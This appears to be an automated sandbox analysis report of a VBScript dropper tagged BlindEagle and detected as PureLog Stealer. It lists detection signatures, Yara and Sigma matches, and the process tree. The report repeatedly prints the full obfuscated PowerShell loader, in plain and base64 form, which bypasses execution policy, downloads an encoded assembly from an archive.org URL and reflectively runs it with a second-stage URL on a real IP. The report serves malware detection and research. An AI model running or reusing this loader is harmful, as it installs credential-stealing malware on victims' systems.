Windows Analysis Report
0BO4n723Q8.vbs

Overview

General Information

Sample name: 0BO4n723Q8.vbs (renamed because original name is a hash value)
Original sample name: 35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b.vbs
Analysis ID: 1523824
MD5: 19f9fc1579433299ad398e80b01f4137
SHA1: f1ebb5f2428d32d75b5c76da93ae9f776f95303a
SHA256: 35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b
Tags: BlindEagle, vbs, user-JAMESWT_MHT
Infos:

Detection

PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
Process Memory Space: powershell.exe PID: 7584 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 7744 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Source | Rule | Description | Author
4.2.powershell.exe.1c4663f0ed8.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
4.2.powershell.exe.1c4663f0ed8.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
4.2.powershell.exe.1c46ddf0000.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
4.2.powershell.exe.1c46ddf0000.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' 
[objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6Jys
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = 
'+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6Jys
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = 
'+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6Jys
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", ProcessId: 7500, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs", ProcessId: 7500, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              No Suricata rule has matched

              AV Detection

Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt; Virustotal: Detection: 10%
Source: http://107.172.148.248/130/RMOTH.txt; Virustotal: Detection: 19%
Source: http://107.172.148.248; Virustotal: Detection: 11%
Source: 0BO4n723Q8.vbs; Virustotal: Detection: 9%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.3% probability
Source: unknown; HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705 version: TLS 1.2
              Source: Binary string: ystem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/tL" source: powershell.exe, 00000004.00000002.1851044596.000001C46D76C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *e.pdb=p source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32% source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1834352585.000001C4665DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
